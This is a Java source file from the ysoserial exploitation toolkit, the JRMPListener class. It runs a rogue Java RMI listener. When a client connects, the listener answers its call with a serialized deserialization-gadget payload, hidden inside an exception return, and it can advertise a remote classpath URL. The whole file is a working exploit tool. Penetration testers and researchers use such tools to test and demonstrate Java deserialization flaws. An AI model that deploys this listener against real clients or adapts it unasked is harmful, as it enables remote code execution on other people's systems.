package ysoserial.exploit; import java.io.BufferedInputStream; import java.io.BufferedOutputStream; import java.io.DataInputStream; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.ObjectStreamClass; import java.io.OutputStream; import java.io.Serializable; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.SocketException; import java.net.URL; import java.rmi.MarshalException; import java.rmi.server.ObjID; import java.rmi.server.UID; import java.util.Arrays; import javax.management.BadAttributeValueExpException; import javax.net.ServerSocketFactory; import javassist.ClassClassPath; import javassist.ClassPool; import javassist.CtClass; import sun.rmi.transport.TransportConstants; import ysoserial.payloads.ObjectPayload.Utils; import ysoserial.payloads.util.Reflections; /** * Generic JRMP listener * * Opens up an JRMP listener that will deliver the specified payload to any * client connecting to it and making a call. * * @author mbechler * */ @SuppressWarnings ( { "restriction" } ) public class JRMPListener implements Runnable { private int port; private Object payloadObject; private ServerSocket ss; private Object waitLock = new Object(); private boolean exit; private boolean hadConnection; private URL classpathUrl; public JRMPListener ( int port, Object payloadObject ) throws NumberFormatException, IOException { this.port = port; this.payloadObject = payloadObject; this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port); } public JRMPListener (int port, String className, URL classpathUrl) throws IOException { this.port = port; this.payloadObject = makeDummyObject(className); this.classpathUrl = classpathUrl; this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port); } public boolean waitFor ( int i ) { try { if ( this.hadConnection ) { return true; } System.err.println("Waiting for connection"); synchronized ( this.waitLock ) { this.waitLock.wait(i); } return this.hadConnection; } catch ( InterruptedException e ) { return false; } } /** * */ public void close () { this.exit = true; try { this.ss.close(); } catch ( IOException e ) {} synchronized ( this.waitLock ) { this.waitLock.notify(); } } public static final void main ( final String[] args ) { if ( args.length < 3 ) { System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>"); System.exit(-1); return; } final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]); try { int port = Integer.parseInt(args[ 0 ]); System.err.println("* Opening JRMP listener on " + port); JRMPListener c = new JRMPListener(port, payloadObject); c.run(); } catch ( Exception e ) { System.err.println("Listener error"); e.printStackTrace(System.err); } Utils.releasePayload(args[1], payloadObject); } public void run () { try { Socket s = null; try { while ( !this.exit && ( s = this.ss.accept() ) != null ) { try { s.setSoTimeout(5000); InetSocketAddress remote = (InetSocketAddress) s.getRemoteSocketAddress(); System.err.println("Have connection from " + remote); InputStream is = s.getInputStream(); InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is); // Read magic (or HTTP wrapper) bufIn.mark(4); DataInputStream in = new DataInputStream(bufIn); int magic = in.readInt(); short version = in.readShort(); if ( magic != TransportConstants.Magic || version != TransportConstants.Version ) { s.close(); continue; } OutputStream sockOut = s.getOutputStream(); BufferedOutputStream bufOut = new BufferedOutputStream(sockOut); DataOutputStream out = new DataOutputStream(bufOut); byte protocol = in.readByte(); switch ( protocol ) { case TransportConstants.StreamProtocol: out.writeByte(TransportConstants.ProtocolAck); if ( remote.getHostName() != null ) { out.writeUTF(remote.getHostName()); } else { out.writeUTF(remote.getAddress().toString()); } out.writeInt(remote.getPort()); out.flush(); in.readUTF(); in.readInt(); case TransportConstants.SingleOpProtocol: doMessage(s, in, out, this.payloadObject); break; default: case TransportConstants.MultiplexProtocol: System.err.println("Unsupported protocol"); s.close(); continue; } bufOut.flush(); out.flush(); } catch ( InterruptedException e ) { return; } catch ( Exception e ) { e.printStackTrace(System.err); } finally { System.err.println("Closing connection"); s.close(); } } } finally { if ( s != null ) { s.close(); } if ( this.ss != null ) { this.ss.close(); } } } catch ( SocketException e ) { return; } catch ( Exception e ) { e.printStackTrace(System.err); } } private void doMessage ( Socket s, DataInputStream in, DataOutputStream out, Object payload ) throws Exception { System.err.println("Reading message..."); int op = in.read(); switch ( op ) { case TransportConstants.Call: // service incoming RMI call doCall(in, out, payload); break; case TransportConstants.Ping: // send ack for ping out.writeByte(TransportConstants.PingAck); break; case TransportConstants.DGCAck: UID u = UID.read(in); break; default: throw new IOException("unknown transport op " + op); } s.close(); } private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception { ObjectInputStream ois = new ObjectInputStream(in) { @Override protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException { if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) { return ObjID[].class; } else if ("java.rmi.server.ObjID".equals(desc.getName())) { return ObjID.class; } else if ( "java.rmi.server.UID".equals(desc.getName())) { return UID.class; } throw new IOException("Not allowed to read object"); } }; ObjID read; try { read = ObjID.read(ois); } catch ( java.io.IOException e ) { throw new MarshalException("unable to read objID", e); } if ( read.hashCode() == 2 ) { ois.readInt(); // method ois.readLong(); // hash System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject())); } System.err.println("Sending return with payload for obj " + read); out.writeByte(TransportConstants.Return);// transport op ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl); oos.writeByte(TransportConstants.ExceptionalReturn); new UID().write(oos); BadAttributeValueExpException ex = new BadAttributeValueExpException(null); Reflections.setFieldValue(ex, "val", payload); oos.writeObject(ex); oos.flush(); out.flush(); this.hadConnection = true; synchronized ( this.waitLock ) { this.waitLock.notifyAll(); } } protected static Object makeDummyObject (String className) { try { ClassLoader isolation = new ClassLoader() {}; ClassPool cp = new ClassPool(); cp.insertClassPath(new ClassClassPath(Dummy.class)); CtClass clazz = cp.get(Dummy.class.getName()); clazz.setName(className); return clazz.toClass(isolation).newInstance(); } catch ( Exception e ) { e.printStackTrace(); return new byte[0]; } } public static class Dummy implements Serializable { private static final long serialVersionUID = 1L; } }